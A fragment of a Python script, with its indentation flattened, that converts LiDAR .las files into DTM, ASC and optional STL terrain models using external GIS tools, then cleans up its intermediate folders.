list_of_las = list(glob.glob('LAS\\*.las'))
list_of_files = [os.path.basename(x).removesuffix('.las') for x in list_of_las]
if MERGE_LAS:
list_of_files = [list_of_files[0]]
# Prep the list of DTM files
list_of_dtm = [f'DTM\\{x}.dtm' for x in list_of_files]
if not os.path.exists('DTM'):
os.mkdir('DTM')
print("\nGenerating .dtm files...\n")
# If necessary, make sure all las files get combined into one DTM
if MERGE_LAS:
os.system(f'{GRID_EXE} {list_of_dtm[0]} {REDUCE_BY} M M 0 0 0 0 LAS\\*.las')
else:
with multiprocessing.Pool() as p:
p.starmap(generate_dem_from_las, zip(list_of_las, list_of_dtm, [args.filter] * len(list_of_las), [REDUCE_BY] * len(list_of_las)))
if not os.path.exists('ASC'):
os.mkdir('ASC')
list_of_asc = [f'ASC\\{x}.asc' for x in list_of_files]
# Convert all the dtm files into asc files
print("\nGenerating .asc files...\n")
for d, a in zip(list_of_dtm, list_of_asc):
print(a)
if os.path.exists(a):
pass
os.system(f'{D2A_EXE} /raster {d} {a}')
if QGIS_COMPATIBLE_DEM:
install_lastools()
list_of_prj = [f'LAS\\{x}.prj' for x in list_of_files]
# Use lastools to generate the prj file that QGIS will need
for l, p in zip(list_of_las, list_of_prj):
os.system(f'{BLAST2DEM_EXE} -i {l} -oasc')
shutil.copy(p, 'ASC')
if GENERATE_STLS:
asc_parse.gen_stls_from_ascs(
list_of_asc=list_of_asc,
list_of_files=list_of_files,
scale_adjustment=REDUCE_BY,
vscale=VERTICAL_SCALE,
base=BASE_HEIGHT,
)
# Delete the directories used for the intermediate steps
print("Cleaning up...")
if DELETE_LAS:
shutil.rmtree('LAS')
shutil.rmtree('DTM')
if __name__ == "__main__":
if sys.platform.startswith('win'):
# On Windows calling this function is necessary.
multiprocessing.freeze_support()
main()
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.